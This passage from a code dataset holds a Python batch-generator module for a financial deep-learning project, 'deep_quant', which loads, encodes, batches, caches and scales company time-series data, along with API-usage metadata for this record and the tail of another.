"line_number": 562, "usage_type": "attribute"}, {"api_name": "task.id", "line_number": 563, "usage_type": "attribute"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 586, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper.conform_url", "line_number": 613, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 613, "usage_type": "name"}, {"api_name": "backend_api.Session.check_min_api_version", "line_number": 618, "usage_type": "call"}, {"api_name": "backend_api.Session", "line_number": 618, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._get_default_session", "line_number": 622, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 622, "usage_type": "name"}, {"api_name": "backend_api.services.models.GetAllRequest", "line_number": 622, "usage_type": "call"}, {"api_name": "backend_api.services.models", "line_number": 622, "usage_type": "name"}, {"api_name": "debugging.log.get_logger", "line_number": 631, "usage_type": "call"}, {"api_name": "backend_interface.util.get_single_result", "line_number": 632, "usage_type": "call"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 640, "usage_type": "call"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 667, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 668, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 673, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 673, "usage_type": "name"}, {"api_name": "config.running_remotely", "line_number": 712, "usage_type": "call"}, {"api_name": "task.input_model", "line_number": 712, "usage_type": "attribute"}, {"api_name": "task.is_main_task", "line_number": 712, "usage_type": "call"}, {"api_name": "task.input_model", "line_number": 713, "usage_type": "attribute"}, {"api_name": "task.input_model", "line_number": 714, "usage_type": "attribute"}, {"api_name": "task.set_input_model", "line_number": 720, "usage_type": "call"}, {"api_name": "task._set_model_config", "line_number": 723, "usage_type": "call"}, {"api_name": "task.set_model_label_enumeration", "line_number": 725, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._unwrap_design", "line_number": 773, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 773, "usage_type": "name"}, {"api_name": "task.Task.current_task", "line_number": 895, "usage_type": "call"}, {"api_name": "task.Task", "line_number": 895, "usage_type": "name"}, {"api_name": "backend_interface.model.create_dummy_model", "line_number": 905, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 906, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 906, "usage_type": "name"}, {"api_name": "task.get_labels_enumeration", "line_number": 907, "usage_type": "call"}, {"api_name": "task.id", "line_number": 910, "usage_type": "attribute"}, {"api_name": "task.output_uri", "line_number": 913, "usage_type": "attribute"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 917, "usage_type": "call"}, {"api_name": "task.name", "line_number": 923, "usage_type": "attribute"}, {"api_name": "config.running_remotely", "line_number": 952, "usage_type": "call"}, {"api_name": "task.is_main_task", "line_number": 952, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 954, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 954, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 959, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 959, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._unwrap_design", "line_number": 965, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 965, "usage_type": "name"}, {"api_name": "task._get_model_config_text", "line_number": 966, "usage_type": "call"}, {"api_name": "task._set_model_config", "line_number": 967, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 969, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 969, "usage_type": "name"}, {"api_name": "task.set_model_label_enumeration", "line_number": 972, "usage_type": "call"}, {"api_name": "storage.helper", "line_number": 1009, "usage_type": "name"}, {"api_name": "storage.helper.StorageHelper.get", "line_number": 1009, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 1009, "usage_type": "name"}, {"api_name": "storage.helper.verify_upload", "line_number": 1013, "usage_type": "call"}, {"api_name": "storage.helper", "line_number": 1013, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1063, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 1100, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper.conform_url", "line_number": 1141, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 1141, "usage_type": "name"}, {"api_name": "six.text_type", "line_number": 1192, "usage_type": "attribute"}, {"api_name": "pathlib2.Path", "line_number": 1192, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 1195, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 1197, "usage_type": "call"}, {"api_name": "zipfile.ZIP_STORED", "line_number": 1197, "usage_type": "attribute"}, {"api_name": "pathlib2.Path", "line_number": 1199, "usage_type": "call"}, {"api_name": "os.close", "line_number": 1201, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 1207, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 1207, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 1265, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 1265, "usage_type": "name"}, {"api_name": "backend_interface.util.validate_dict", "line_number": 1289, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 1289, "usage_type": "attribute"}, {"api_name": "six.integer_types", "line_number": 1289, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model.wait_for_results", "line_number": 1317, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 1317, "usage_type": "name"}]} +{"seq_id": "185235307", "text": "# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport os\nimport time\nimport sys\nimport random\nimport pickle\nimport hashlib\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.preprocessing\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\n_MIN_SEQ_NORM = 1.0\nDEEP_QUANT_ROOT = os.environ['DEEP_QUANT_ROOT']\nDATASETS_PATH = os.path.join(DEEP_QUANT_ROOT, 'datasets')\n\n\ndef np_array_index(arr, value):\n \"\"\"\n Replicates the Python list's `index` method (that is, it returns\n the first appearance of `value` in the array).\n \n Raises `ValueError` if `value` is not present in `arr`.\n \"\"\"\n index = None\n for i, element in enumerate(arr):\n if element == value:\n index = i\n break\n\n if index is None:\n raise ValueError(\"{} is not in arr.\".format(value))\n\n return index\n\nclass BatchGenerator(object):\n \"\"\"\n A `BatchGenerator` object has a `next_batch` method that yields a batch of\n data sequences from the datafile whose shape is specified by\n `config.batch_size` and config.max_unrollings.\n \n A `BatchGenerator` can be initiated either by reading data from a .dat file\n or by passing the data explicitly, as a Pandas DataFrame.\n \"\"\"\n def __init__(self, datpath, config, validation=True, require_targets=True,\n data=None, verbose=True):\n \"\"\"Initalizes a `BatchGenerator`.\n\n Unless passed to the constructor explicitly using the `data` parameter\n (must be passed as a Pandas DataFrame), data is loaded as a Pandas\n DataFrame (from the .dat file at datpath) and stored in the `_data`\n attribute.\n\n Sequences of length `config.max_unrollings` are identified; the start\n and end indices of these sequences are stored in the `_start_indices`\n and `_end_indices` attributes of our `BatchGenerator` object,\n respectively. (These are both lists of equal length that indicate the\n indices of the start and of the end of every sequence that can be made\n from data stored in the `_data` DataFrame.)\n\n Indices are set up to access `config.batch_size` of these sequences as a\n batch; these are set up in such way that these sequences are \"far apart\"\n from each other in `_data` (more specifically, they're `_num_batches`\n spots away from each other in `_starat_indices` and `_end_indices`).\n This way it's unlikely that more than one sequence corresponds to the\n same company in a batch.\n\n This constructor also sets up an `_index_cursor` attribute and a\n `_batch_cursor` attribute. The former is a Python list that contains\n `config.batch_size` integers; each of these indexes a sequence of\n timestamps to be used in modeling (these sequences are fully determined\n by the corresponding values in `_start_indices` and `end_indices`). As\n each batch is consumed, this list is updated to point at a different\n group of sequences. The `_batch_cursor` is used to keep track of which\n of the `_num_batches` we're looking at.\n\n Args:\n datapath: A string that specifies the full path to a .dat file.\n config: A ConfigValues object (see configs.py). This is the\n interface that allows the user to pass settings necessary for\n building a BatchGenerator (such as which pieces of data to use\n in for making predictions, what to predict, what to scale by,\n how to scale, how many observations a Batch should have, etc.);\n these configurations are either specified at the command line\n when running deep_quant.py or set in a .conf file (within the\n `config` directory), and specified at the command line.\n validation: A boolean. Specifies whether a set of tickers should be\n randomly picked and set aside for validation or not. (Note that\n if this is set to True, one can then call the `valid_batches`\n method and obtain a new `BatchGenerator` object with the\n validation set as batches. (True by default)\n require_targets: A boolean. (True by default)\n data: A Pandas DataFrame from which to generate batches. (None by\n default)\n verbose: A boolean. (True by default)\n \"\"\"\n def init_data_attribute(self, datpath, config, data):\n \"\"\"Initializes `_data`, `_aux_colixs`, and `_data_len`\n\n Reads .dat file at `datpath` unless a Pandas DataFrame is passed as\n `data`. Gets rid of excess timesteps if necessary.\n \n If a .dat file was read and any categorical covariates are present\n (as specified by `config.categorical_fields`), these are encoded\n into their corresponding one-hot representation (as specified by its\n `field-encoding.dat` file); this one-hot representation is appended\n to the right of the `_data` attribute.\n \n Initializes the `_aux_colixs` attribute as a list. (If any encoding\n of categorical covariates takes place, this list is populated with\n the column indices of the columns that hold the one-hot\n representation of these.)\n \"\"\"\n def encode_cat_attrib(data, cat_attrib):\n \"\"\"\n Gets one-hot representation of the categorical attribute under\n `cat_attrib` column of the `data` DataFrame, appends that at\n right-end of `data`, returns the updated `data` DataFrame, and a\n list that contains the column indices of the columns that hold\n the one-hot representation of `cat_attrib`.\n \"\"\"\n # Load encoding file as Pandas DataFrame\n encoding_file = \"{}-encoding.dat\".format(cat_attrib.lower())\n encoding_path = os.path.join(DATASETS_PATH, encoding_file)\n encoding_df = pd.read_csv(encoding_path, sep=' ')\n\n # Get categories under `cat_attrib` column as Numpy array of\n # codes (these codes are integers as specified in encoding file)\n cat_enc = LabelEncoder()\n cat_enc.fit(encoding_df[cat_attrib].values)\n categories = data[cat_attrib].values\n codes = cat_enc.transform(categories).reshape(-1, 1)\n\n # Get one-hot representation of each example's `cat_attrib`\n onehot_enc = OneHotEncoder(n_values=len(cat_enc.classes_))\n onehot_enc.fit(encoding_df['code'].values.reshape(-1, 1))\n onehot_vecs = onehot_enc.transform(codes).toarray()\n onehot_colnames = ['is_' + lev for lev in cat_enc.classes_]\n\n # Write all one-hot columns on the right side\n _, m = data.shape\n codes_df = pd.DataFrame(onehot_vecs,columns=onehot_colnames)\n data = pd.concat([data, codes_df], axis=1)\n\n # Store the column indices\n onehot_colixs = list(range(m, m + onehot_enc.n_values))\n \n return data, onehot_colixs\n\n cat_fields = config.categorical_fields\n cat_attribs = cat_fields.split(',') \\\n if cat_fields is not None else []\n\n self._aux_colixs = list()\n onehot_colixs = list()\n # Load data if necessary\n if data is None:\n data = pd.read_csv(datpath, sep=' ',\n dtype={config.key_field: str})\n # Encode categorical covariates\n for cat_attrib in cat_attribs:\n data, onehot_colixs = encode_cat_attrib(data, cat_attrib)\n else:\n # Simply get the column indices of the one-hot columns\n for cat_attrib in cat_attribs:\n onehot_colixs = [i for i, col \\\n in enumerate(data.columns.values) \\\n if col.startswith('is_')]\n \n self._aux_colixs += onehot_colixs\n\n # Get rid of excess dates\n data = data.drop(data[data['date'] < config.start_date].index)\n data = data.drop(data[data['date'] > config.end_date].index)\n\n # Store attributes\n self._data = data\n self._data_len = len(data)\n assert self._data_len\n\n return\n\n def init_column_indices(self, config):\n \"\"\"Initializes `_fin_colixs`, `_fin_inputs`, and `aux_inputs`.\n\n Sets up column-index-related attributes and adds a few items to the\n config.\n\n Column-index-related attributes:\n * `_fin_colixs`: A list housing the column numbers of the \n features, where features are as specified by\n config.financial_fields.\n * `_aux_colixs`: A list housing the column numbers of the auxilary\n covariates, where these auxilary covariates are specified by\n config.aux_fields.\n * `_input_names`: A list housing the names of the columns of the\n features _and_ of the auxilary covariates.\n * `_num_inputs`: The total number of covariates used as input (so \n those that are specified in config.financial_fields, those\n that are specified in config.aux_fields, and those specified\n in config.categorical_fields).\n * `_key_idx`: The column index of what should be used as a unique\n identifier of each company (the index of gvkey, for example).\n * `_active_idx`: The column index of the field that lets us know\n whether a company was actively trading during a specific point\n in time or not.\n * `_date_idx`: The column index of the date field.\n\n Items added to the config:\n * `num_inputs`: same as the _num_inputs attribute\n * `num_ouptus`: num_inputs minus the number of aux covariates.\n * `target_idx`: index of target variable within the list of\n features, if target is specified by config.\n \"\"\"\n def get_colixs_from_colname_range(data, colname_range):\n \"\"\"\n Returns indexes of columns of `data` that are in the range of\n `colname_range`, inclusive. `colname_range` should be a string\n with the following format: start_column_name-end_column_name\n (saleq_ttm-ltq_mrq, for example).\n \"\"\"\n if colname_range is None:\n colixs = []\n else:\n assert 0 < colname_range.find('-') < len(colname_range)-1\n first, last = colname_range.split('-')\n start_ix = list(data.columns.values).index(first)\n end_ix = list(data.columns.values).index(last)\n assert start_ix >= 0\n assert start_ix <= end_ix\n colixs = list(range(start_ix, end_ix+1))\n return colixs\n \n assert config.financial_fields\n # Set up financials column indices and auxiliaries column indices\n self._fin_colixs = get_colixs_from_colname_range(\n self._data, config.financial_fields)\n\n self._aux_colixs += get_colixs_from_colname_range(\n self._data, config.aux_fields)\n\n # Set up other attributes\n colnames = self._data.columns.values\n self._key_idx = np_array_index(colnames, config.key_field)\n self._keys = self._data[config.key_field].tolist()\n self._date_idx = np_array_index(colnames, 'date') # TODO: make a config\n self._dates = self._data['date'].tolist()\n self._active_idx = np_array_index(colnames, config.active_field)\n self._normalizer_idx = np_array_index(colnames, config.scale_field)\n\n # Set up input-related attributes\n self._input_names = list(colnames[self._fin_colixs\\\n + self._aux_colixs])\n self._num_inputs = config.num_inputs = len(self._input_names)\n\n # Set up target index\n idx = np_array_index(colnames, config.target_field)\n if config.target_field == 'target':\n config.target_idx = 0\n self._num_outputs = config.num_outputs = 1\n self._price_target_idx = idx\n else:\n config.target_idx = idx - self._fin_colixs[0]\n self._num_outputs = config.num_outputs = self._num_inputs \\\n - len(self._aux_colixs)\n self._price_target_idx = -1\n\n assert(config.target_idx >= 0)\n\n # Set up fin_inputs attribute and aux_inputs attribute\n self._fin_inputs = self._data.iloc[:, self._fin_colixs].as_matrix()\n self._aux_inputs = self._data.iloc[:, self._aux_colixs].as_matrix()\n\n def init_validation_set(self, config, validation, verbose=True):\n \"\"\"Sets up validation set, if necessary. \n\n Creates the _validation_set attribute, which is a set housing the\n keys (unique identifier, such as gvkey) of the companies that should\n be used for validation.\n \"\"\"\n # Setup the validation data\n self._validation_set = set()\n\n if validation is True:\n if config.seed is not None:\n if verbose is True:\n print(\"\\nSetting random seed to \" + str(config.seed))\n random.seed(config.seed)\n np.random.seed(config.seed)\n\n # get number of keys\n keys = sorted(set(self._data[config.key_field]))\n sample_size = int(config.validation_size * len(keys))\n sample = random.sample(keys, sample_size)\n self._validation_set = set(sample)\n\n if verbose is True:\n print(\"Num training entities: %d\"%(len(keys) - sample_size))\n print(\"Num validation entities: %d\"%sample_size)\n return\n\n def init_batch_cursor(self, config, require_targets=True, verbose=True):\n \"\"\"Sets up indexes into the sequences.\n\n First, identifies start and end points of sequences (stored as\n `_start_indices` and `_end_indices`).\n\n Then, sets up two cursors: \n (1) `_index_cursor`, which is a cursor of equally-spaced indices \n into the dataset. Here, each index points to a sequence (which\n can be determined fully using `_data`, `_start_indices`, and\n `_end_indices`). There will be config.batch_size indices in\n this list. \n (2) `_batch_cursor`, which keeps track of the batch that we're\n working with. (This is just an int that changes as we go\n through the dataset in batches, and loops around once we've\n consumed the entire dataset.)\n\n Note that the number of batches is dictated by the number of\n sequences available and the user-defined size of each batch (as\n specified in `config.batch_size`). (The number of sequences\n available in turn depends on the length of those sequences,\n `config.max_unrollings` as well as the size of the dataset).\n \n Here, an attribute called `_batch_cache` is also created. This is a\n Python list of size `config.num_batches` that will house the\n contents of each batch (as a `Batch` object) once they're cached. \n \n Lastly, an attribute called `_init_index_cursor` is also created.\n This is simply a copy of `_index_cursor` in its original state,\n which will allow us to go back to the start if we need to once\n `_index_cursor` has changed.\n \"\"\"\n def store_sequence_start_end_indices(self, data, stride, \n forecast_n, min_steps, max_steps, require_targets, config):\n \"\"\"\n Populates the `_start_indices` and `_end_indices` attributes\n with the start and end index of each possible sequence in\n `data`.\n \"\"\"\n start_date = config.start_date if config.start_date is not None\\\n else 100001\n last_key = \"\"\n cur_length = 1\n\n for i in range(self._data_len):\n key = data.iat[i, self._key_idx]\n if i+forecast_n < len(data):\n pred_key = data.iat[i+forecast_n, self._key_idx]\n else:\n pred_key = \"\"\n\n active = True if int(data.iat[i,self._active_idx]) else False\n date = data.iat[i,self._date_idx]\n\n if key != last_key:\n cur_length = 1\n\n if ((cur_length >= min_steps)\n and (active is True)\n and (date >= start_date)):\n # If targets are not required, we don't need the future\n # sequences to be there, otherwise we do\n seq_len = min(cur_length-(cur_length-1) % stride, \n max_steps)\n if (not require_targets) or (key == pred_key):\n self._start_indices.append(i-seq_len+1)\n self._end_indices.append(i)\n cur_length += 1\n last_key = key\n\n return \n\n self._start_indices = list()\n self._end_indices = list()\n \n min_steps = self._stride*(self._min_unrollings-1)+1\n max_steps = self._stride*(self._max_unrollings-1)+1\n store_sequence_start_end_indices(self, self._data, self._stride, \n self._forecast_n, min_steps, max_steps, require_targets, config)\n\n if verbose is True:\n print(\"Num. of sequences: %d\"%(len(self._start_indices)))\n\n # Create a cursor of equally spaced indices into the dataset. Each\n # index in the cursor points to one sequence in a batch and is used\n # to keep track of where we are in the dataset.\n self._num_batches = len(self._start_indices) // self._batch_size\n self._index_cursor = [offset*self._num_batches for offset in \\\n range(self._batch_size)]\n self._init_index_cursor = self._index_cursor[:]\n self._batch_cache = [None]*self._num_batches\n self._batch_cursor = 0\n\n # Store configs that'll later be used as attributes\n self._scaling_feature = config.scale_field\n self._scaling_params = None\n self._start_date = config.start_date\n self._end_date = config.end_date\n self._max_unrollings = config.max_unrollings\n self._min_unrollings = config.min_unrollings\n self._stride = config.stride\n self._forecast_n = config.forecast_n\n self._batch_size = config.batch_size\n\n assert self._stride >= 1\n \n # Initialize data\n init_data_attribute(self, datpath, config, data)\n init_column_indices(self, config)\n init_validation_set(self, config, validation, verbose)\n\n # Initialize cursors\n init_batch_cursor(self, config, require_targets, verbose)\n\n # Save config for the `train_batches` and the `valid_batches` method\n self._config = config\n\n def _get_normalizer(self, end_idx):\n val = max(self._data.iat[end_idx, self._normalizer_idx], \n _MIN_SEQ_NORM)\n return val\n\n def _get_batch_normalizers(self):\n \"\"\"\n Returns an np.array housing the normalizers (scalers) by which\n the inputs of the current sequence should be scaled (this is\n specified by config.scale_field).\n \"\"\"\n v_get_normalizer = np.vectorize(self._get_normalizer)\n end_idxs = np.array(self._end_indices)[self._index_cursor]\n return v_get_normalizer(end_idxs)\n\n def _get_feature_vector(self, end_idx, cur_idx):\n if cur_idx < self._data_len:\n s = self._get_normalizer(end_idx)\n assert(s>0)\n x = self._fin_inputs[cur_idx]\n y = np.divide(x,s)\n y_abs = np.absolute(y).astype(float)\n return np.multiply(np.sign(y),np.log1p(y_abs))\n else:\n return np.zeros(shape=[len(self._fin_colixs)])\n\n def _get_aux_vector(self,cur_idx):\n if cur_idx < self._data_len:\n x = self._aux_inputs[cur_idx]\n return x\n else:\n return np.zeros(shape=[len(self._aux_colixs)])\n\t\t\t\n def next_batch(self):\n \"\"\"Gets next batch as a Python list of `Batch` objects.\n\n Fetches next batch via the `_next_batch` method (if not already saved),\n saves batch onto the `_batch_cache` attribute list and also returns it.\n Also updates `_batch_cursor` to point to the following batch.\n \"\"\"\n def get_next_batch(self):\n \"\"\"\n Generate the next batch of sequences from the data.\n Returns:\n A batch of type Batch (see class def below)\n \"\"\"\n def get_step_for_batch(self, step, seq_lengths):\n \"\"\"\n Get step for entire batch.\n \"\"\"\n def get_step_for_seq(self, step, batch_seq_num):\n \"\"\"\n Get step for a particular sequence.\n \"\"\"\n seq_x = np.zeros(self._num_inputs)\n seq_y = np.zeros(self._num_outputs)\n stride = self._stride\n forecast_n = self._forecast_n\n len1 = len(self._fin_colixs)\n len2 = len(self._aux_colixs)\n \n # Get generally-relevant indices about the sequence\n global_seq_num = self._index_cursor[batch_seq_num]\n seq_start_idx = self._start_indices[global_seq_num]\n seq_end_idx = self._end_indices[global_seq_num]\n seq_lengths[batch_seq_num] = ((seq_end_idx-seq_start_idx)\\\n //stride)+1\n \n # Get indices particular to this step within the sequence\n seq_step_idx = seq_start_idx + step*stride\n assert(seq_step_idx < self._data_len)\n seq_step_date = self._dates[seq_step_idx]\n seq_step_key = self._keys[seq_step_idx]\n nextstep_idx = seq_step_idx + forecast_n\n if nextstep_idx < len(self._keys):\n next_key = self._keys[nextstep_idx]\n else:\n next_key = \"\"\n \n # Store that step-in-the-sequence's data onto x, y, and attr\n if seq_step_idx > seq_end_idx:\n seq_attr = None\n seq_x[:] = 0.0 # TODO: better way to impute this?\n seq_y[:] = 0.0 # TODO: better way to impute this?\n else:\n seq_attr = (seq_step_key, seq_step_date)\n seq_x[0:len1] = self._get_feature_vector(seq_end_idx,\n seq_step_idx)\n if len2 > 0:\n seq_x[len1:len1+len2] = self._get_aux_vector(\n seq_step_idx)\n \n if seq_step_key == next_key: # targets exist\n seq_y[:] = self._get_feature_vector(seq_end_idx,\n nextstep_idx)\n else: # no targets exist\n seq_y[:] = None\n \n return seq_x, seq_y, seq_attr\n \n # Initialize arrays and list to populate\n x = np.zeros(shape=(self._batch_size, self._num_inputs),\n dtype=np.float)\n y = np.zeros(shape=(self._batch_size, self._num_outputs),\n dtype=np.float)\n attr = list()\n \n # Populate arrays\n for batch_seq_num in range(self._batch_size):\n seq_x, seq_y, seq_attr = get_step_for_seq(self, \n step, batch_seq_num)\n x[batch_seq_num] = seq_x\n y[batch_seq_num] = seq_y\n attr.append(seq_attr)\n \n return x, y, attr\n \n normalizers = self._get_batch_normalizers()\n seq_lengths = np.array([self._max_unrollings]*self._batch_size)\n \n inputs = list()\n targets = list()\n attribs = list()\n for step in range(self._max_unrollings):\n x, y, attr = get_step_for_batch(self, step, seq_lengths)\n inputs.append(x)\n targets.append(y)\n attribs.append(attr)\n \n assert len(inputs) == len(targets)\n \n # Set cursor for next batch\n batch_size = self._batch_size\n num_idxs = len(self._start_indices)\n self._index_cursor = [(self._index_cursor[b]+1) % num_idxs \\\n for b in range(batch_size)]\n \n return Batch(inputs, targets, attribs, normalizers, seq_lengths)\n\n b = None\n # Get batch\n if self._batch_cache[self._batch_cursor] is not None:\n # if it's already cached then just get it from `_batch_cache` list\n b = self._batch_cache[self._batch_cursor]\n else:\n # otherwise get it and cache it onto `_batch_cache` list\n b = get_next_batch(self)\n self._batch_cache[self._batch_cursor] = b\n\n # Update `_batch_cursor` to point to next batch (wrap around if needed)\n self._batch_cursor = (self._batch_cursor+1) % (self._num_batches)\n\n return b\n\n def cache(self, verbose=False):\n \"\"\"Caches data if not already cached.\n\n Does so by either reading cache from a pickled file in the _bcache\n directory, or by loading the cache (via the `load_cache` local function,\n which in turn relies on the `next_batch` global function), and\n subsequently writing that to the `_bcache` directory as a pickled file\n for posterity.\n \"\"\"\n def get_cache_filename(self):\n key_list = sorted(set(self._data[self._config.key_field]))\n keys = ''.join(key_list)\n sd = self._start_date if self._start_date is not None else 100001\n ed = self._end_date if self._end_date is not None else 999912\n uid = \"%d-%d-%d-%d-%d-%d-%d-%s-%s-%s\" % (\n self._config.cache_id, sd, ed,\n self._max_unrollings,\n self._min_unrollings,\n self._stride,\n self._batch_size,\n self._config.financial_fields,\n self._config.aux_fields,\n keys)\n\n hashed = hashlib.md5(uid.encode()).hexdigest()\n filename = \"bcache-%s.pkl\" % hashed\n return filename\n\n def read_cache_from_pickle(self, filepath, verbose):\n start_time = time.time()\n if verbose is True:\n print(\"Reading cache from %s ...\" % filepath, end=' ')\n self._batch_cache = pickle.load(open(filepath, \"rb\"))\n self._num_batches = len(self._batch_cache) # TODO: remove line?\n if verbose is True:\n print(\"done in %.2f seconds.\"%(time.time() - start_time))\n return\n\n def load_cache(self, verbose):\n \"\"\"\n Caches batches from `self` by calling the `next_batch` method\n (which writes batch to the list held by the `_batch_cache`\n attribute).\n \"\"\"\n start_time = time.time()\n if verbose is True:\n print(\"\\nCaching batches...\", end=' '); sys.stdout.flush()\n\n self.rewind()\n for _ in range(self._num_batches):\n b = self.next_batch()\n\n if verbose is True:\n print(\"done in %.2f seconds.\" % (time.time() - start_time))\n\n def write_cache_to_pickle_at_filepath(self, filepath, verbose):\n start_time = time.time()\n if verbose is True:\n print(\"Writing cache to %s ...\"%filepath, end=' ')\n pickle.dump(self._batch_cache, open(filepath, \"wb\"))\n if verbose is True:\n print(\"done in %.2f seconds.\"%(time.time() - start_time))\n\n assert len(self._batch_cache)\n if all(self._batch_cache):\n # data already cached\n pass\n else:\n # cache is (at least partially) empty (not all data already cached)\n if self._config.cache_id is not None:\n # cache WILL be read from pickle or loaded and saved onto pickle\n filename = get_cache_filename(self)\n dirname = '_bcache'\n filepath = os.path.join(dirname, filename)\n\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n if os.path.isfile(filepath):\n # read cache if already been loaded and pickled\n read_cache_from_pickle(self, filepath, verbose)\n else:\n # otherwise load it and pickle it for posterity\n load_cache(self, verbose)\n write_cache_to_pickle_at_filepath(self, filepath, verbose)\n else:\n # cache WILL NOT be read from pickle or saved as pickle\n load_cache(self, verbose)\n return\n\n def train_batches(self):\n \"\"\"\n Returns a BatchGenerator object built from the subset of self._data that\n corresponds to the 'keys' (uniquely-identified companies) that are _not_\n in the validation set.\n \"\"\"\n valid_keys = list(self._validation_set)\n valid_rows = self._data[self._config.key_field].isin(valid_keys)\n train_data = self._data[~valid_rows]\n return BatchGenerator(\"\", self._config, validation=False,\n data=train_data)\n\n def valid_batches(self):\n \"\"\"\n Returns a BatchGenerator object built from the subset of self._data that\n corresponds to the 'keys' (uniquely-identified companies) that _are_ in\n the validation set.\n \"\"\"\n valid_keys = list(self._validation_set)\n valid_rows = self._data[self._config.key_field].isin(valid_keys)\n valid_data = self._data[valid_rows]\n return BatchGenerator(\"\", self._config, validation=False,\n data=valid_data)\n\n def shuffle(self):\n if all(self._batch_cache):\n # We cannot shuffle until the entire dataset is cached\n random.shuffle(self._batch_cache)\n self._batch_cusror = 0\n return\n\n def rewind(self):\n \"\"\"\n Resets _batch_cursor index to ensure we're working with the first batch.\n \"\"\"\n self._batch_cursor = 0\n\n def get_scaling_params(self, scaler_class):\n if self._scaling_params is None:\n stride = self._stride\n data = self._data\n sample = list()\n z = zip(self._start_indices,self._end_indices)\n indices = random.sample(list(z),\n int(0.10*len(self._start_indices)))\n for start_idx, end_idx in indices:\n step = random.randrange(self._min_unrollings)\n cur_idx = start_idx+step*stride\n x1 = self._get_feature_vector(end_idx,cur_idx)\n sample.append(x1)\n #x2 = self._get_aux_vector(i,idx)\n #sample.append(np.append(x1,x2))\n\n scaler = None\n if hasattr(sklearn.preprocessing, scaler_class):\n scaler = getattr(sklearn.preprocessing, scaler_class)()\n else:\n raise RuntimeError(\"Unknown scaler = %s\"%scaler_class)\n\n scaler.fit(sample)\n\n params = dict()\n params['center'] = scaler.center_ if hasattr(scaler,'center_') else scaler.mean_\n params['scale'] = scaler.scale_\n\n num_aux = len(self._aux_colixs)\n if num_aux > 0:\n params['center'] = np.append(params['center'], np.full( (num_aux), 0.0 ))\n params['scale'] = np.append(params['scale'], np.full( (num_aux), 1.0 ))\n\n self._scaling_params = params\n\n return self._scaling_params\n\n def get_raw_inputs(self,batch,idx,vec):\n len1 = len(self._fin_colixs)\n len2 = len(self._aux_colixs)\n n = batch.normalizers[idx]\n x = vec[0:len1]\n y = n * np.multiply(np.sign(x),np.expm1(np.fabs(x)))\n if len2 > 0 and len(vec) > len1:\n assert(len(vec)==len1+len2)\n y = np.append( y, vec[len1:len1+len2] )\n return y\n\n def get_raw_outputs(self,batch,idx,vec):\n if self._price_target_idx >= 0:\n return vec\n else:\n return self.get_raw_inputs(batch,idx,vec)\n\n @property\n def feature_names(self):\n return self._input_names\n\n @property\n def dataframe(self):\n return self._data\n\n @property\n def num_batches(self):\n return self._num_batches\n\n @property\n def max_unrollings(self):\n return self._max_unrollings\n\n @property\n def num_inputs(self):\n return self._num_inputs\n\n @property\n def num_outputs(self):\n return self._num_outputs\n\nclass Batch(object):\n def __init__(self, inputs, targets, attribs, normalizers, seq_lengths):\n self._inputs = inputs\n self._targets = targets\n self._attribs = attribs\n self._normalizers = normalizers\n self._seq_lengths = seq_lengths\n\n @property\n def inputs(self):\n return self._inputs\n\n @property\n def targets(self):\n return self._targets\n\n @property\n def attribs(self):\n return self._attribs\n\n #@property\n #def size(self):\n # return len(self._attribs)\n\n @property\n def normalizers(self):\n return self._normalizers\n\n @property\n def seq_lengths(self):\n return self._seq_lengths\n", "sub_path": "scripts/batch_generator.py", "file_name": "batch_generator.py", "file_ext": "py", "file_size_in_byte": 35966, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, 